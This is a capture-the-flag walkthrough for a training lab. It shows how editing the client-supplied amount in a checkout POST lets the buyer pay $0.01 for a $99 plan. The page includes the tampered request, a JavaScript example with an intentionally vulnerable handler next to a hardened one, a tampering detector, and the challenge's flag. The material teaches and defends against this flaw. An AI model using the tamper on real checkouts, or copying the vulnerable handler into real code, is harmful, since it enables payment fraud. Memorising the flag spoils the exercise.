HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Plan Checkout — eCorp Fintech

Business Logic Flaws · Client-Side Price Manipulation
Difficulty: Intermediate
Vuln class: Client-Side Price Manipulation
Steps: 4
// Objective
Intercept the checkout request for eCorp's paid plan and manipulate the price field to pay $0.01 instead of the real price.
// Tools required
Browser Developer Tools, Burp Suite
// Step-by-step walkthrough
1
Browse the pricing page
Navigate to the eCorp Fintech pricing page. Select the Pro Plan ($99/month) and proceed to checkout. Open DevTools → Network tab before clicking "Pay".
2
Intercept the checkout request
Click "Pay" and catch the outgoing POST request in the Network tab. Inspect the request body.
Command / Input
POST /api/checkout
Content-Type: application/json

{"plan":"pro","amount":9900,"currency":"usd"}
The amount field (in cents) is supplied by the client. If the server trusts it instead of re-deriving the price from the plan name, the price is entirely under the attacker's control; step 3 confirms that this server does exactly that.
3
Resend the request with a modified price
Use DevTools "Edit and Resend" or Burp Repeater to modify the amount field to 1 (= $0.01) and resend.
Command / Input
POST /api/checkout

{"plan":"pro","amount":1,"currency":"usd"}
Output
{"status":"success","message":"Payment accepted","receipt":"TXN-00291"}
The server accepted $0.01 for a $99 plan. This is the core of price manipulation: the server delegated the authoritative price to the untrusted client. The fix is to look the price up server-side from the plan identifier and to treat any client-supplied amount as, at most, a consistency check that rejects the request on mismatch; the charge itself must never use the number from the request body.
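The handler behaviour the walkthrough infers in steps 2 and 3, written out as an added example (not code from hackr.gg or from the eCorp challenge): a checkout handler that trusts the client's amount, the hardened version that derives the price from the plan server-side, the step-3 tamper applied to the captured request body, and a log check that flags any checkout whose amount disagrees with the catalog. The plan catalog, currency list, receipt format, handler shape and log-line format are assumptions; only the Pro plan at 9900 cents and the 1-cent tamper come from the page.

```javascript
// Added example (not hackr.gg's or eCorp's code). Plans other than "pro",
// the receipt format and the log format are assumptions for illustration.

// Server-side price catalog in integer cents (assumed; the page only shows "pro" at $99).
const PLAN_PRICES_CENTS = { basic: 2900, pro: 9900, enterprise: 49900 };
const SUPPORTED_CURRENCIES = new Set(["usd"]);

// hasOwnProperty rather than `in`, so "constructor" or "__proto__" is not a valid plan.
function knownPlan(plan) {
  return typeof plan === "string" && Object.prototype.hasOwnProperty.call(PLAN_PRICES_CENTS, plan);
}

let receiptCounter = 290; // receipt numbering is made up; the page shows TXN-00291
function nextReceipt() {
  receiptCounter += 1;
  return `TXN-${String(receiptCounter).padStart(5, "0")}`;
}

// Stand-in for the payment processor: it charges whatever amount it is handed.
function chargeCard(amountCents, currency) {
  return { charged: amountCents, currency, receipt: nextReceipt() };
}

// VULNERABLE (the behaviour seen in step 3): body.amount goes straight to the
// processor; the price is never re-derived from body.plan.
function vulnerableCheckout(body) {
  const { plan, amount, currency } = body;
  if (!knownPlan(plan)) {
    return { status: 400, body: { status: "error", message: "Unknown plan" } };
  }
  const tx = chargeCard(amount, currency);
  return { status: 200, body: { status: "success", message: "Payment accepted", receipt: tx.receipt, charged: tx.charged } };
}

// HARDENED: the price comes from the catalog. The client amount is only a
// consistency check (stale pricing page or tampering); the charge never uses it.
function hardenedCheckout(body) {
  const { plan, amount, currency } = body;
  if (!knownPlan(plan)) {
    return { status: 400, body: { status: "error", message: "Unknown plan" } };
  }
  if (!SUPPORTED_CURRENCIES.has(currency)) {
    return { status: 400, body: { status: "error", message: "Unsupported currency" } };
  }
  const expected = PLAN_PRICES_CENTS[plan];
  if (!Number.isInteger(amount) || amount !== expected) {
    // Reject rather than silently "correct": the user may not have seen the
    // real price, and a tampering attempt should surface in logs.
    return { status: 409, body: { status: "error", message: "Price mismatch; reload the pricing page", expected } };
  }
  const tx = chargeCard(expected, currency);
  return { status: 200, body: { status: "success", message: "Payment accepted", receipt: tx.receipt, charged: tx.charged } };
}

// The step-3 tamper: take the captured JSON body and change only the amount.
function tamperAmount(capturedJson, newAmountCents) {
  const body = JSON.parse(capturedJson);
  return JSON.stringify({ ...body, amount: newAmountCents });
}

// Detection: flag checkout log lines whose client amount differs from the catalog.
// Assumed log-line format: "<timestamp> POST /api/checkout <json body>".
function findPriceTampering(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/^(\S+) POST \/api\/checkout (\{.*\})$/);
    if (!m) continue;
    let body;
    try { body = JSON.parse(m[2]); } catch (_) { continue; }
    if (knownPlan(body.plan) && body.amount !== PLAN_PRICES_CENTS[body.plan]) {
      hits.push({ ts: m[1], plan: body.plan, sent: body.amount, expected: PLAN_PRICES_CENTS[body.plan] });
    }
  }
  return hits;
}

// Constructed sample log (not from the challenge): one legitimate Pro checkout,
// one tampered, one non-checkout line, one Basic checkout, one malformed body.
const SAMPLE_LOG = [
  '2024-05-01T10:00:01Z POST /api/checkout {"plan":"pro","amount":9900,"currency":"usd"}',
  '2024-05-01T10:00:07Z POST /api/checkout {"plan":"pro","amount":1,"currency":"usd"}',
  '2024-05-01T10:00:09Z GET /api/plans',
  '2024-05-01T10:01:00Z POST /api/checkout {"plan":"basic","amount":2900,"currency":"usd"}',
  '2024-05-01T10:01:30Z POST /api/checkout not-json',
];

// Replay of the walkthrough against both handlers.
const CAPTURED = '{"plan":"pro","amount":9900,"currency":"usd"}';
const TAMPERED = tamperAmount(CAPTURED, 1);
console.log("vulnerable:", vulnerableCheckout(JSON.parse(TAMPERED)).body);
console.log("hardened:  ", hardenedCheckout(JSON.parse(TAMPERED)).body);
console.log("log hits:  ", findPriceTampering(SAMPLE_LOG));
```

The hardened handler deliberately returns a 409 on mismatch instead of quietly charging the catalog price: a silent correction hides tampering from monitoring and can charge a user a price they never saw. The same catalog lookup should be repeated wherever the amount is confirmed later (for example, when the payment provider reports the completed charge), since the checkout endpoint is not the only place a client-controlled number can enter the flow.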
4
Retrieve the flag
After the successful "purchase", the flag appears on the order confirmation page.
Output
HackrGG{bus1n3ss_l0g1c_pr1c3_t4mp3r}
// Flag
Flag value
HackrGG{bus1n3ss_l0g1c_pr1c3_t4mp3r}
Shown on the order confirmation page after a successful manipulated checkout.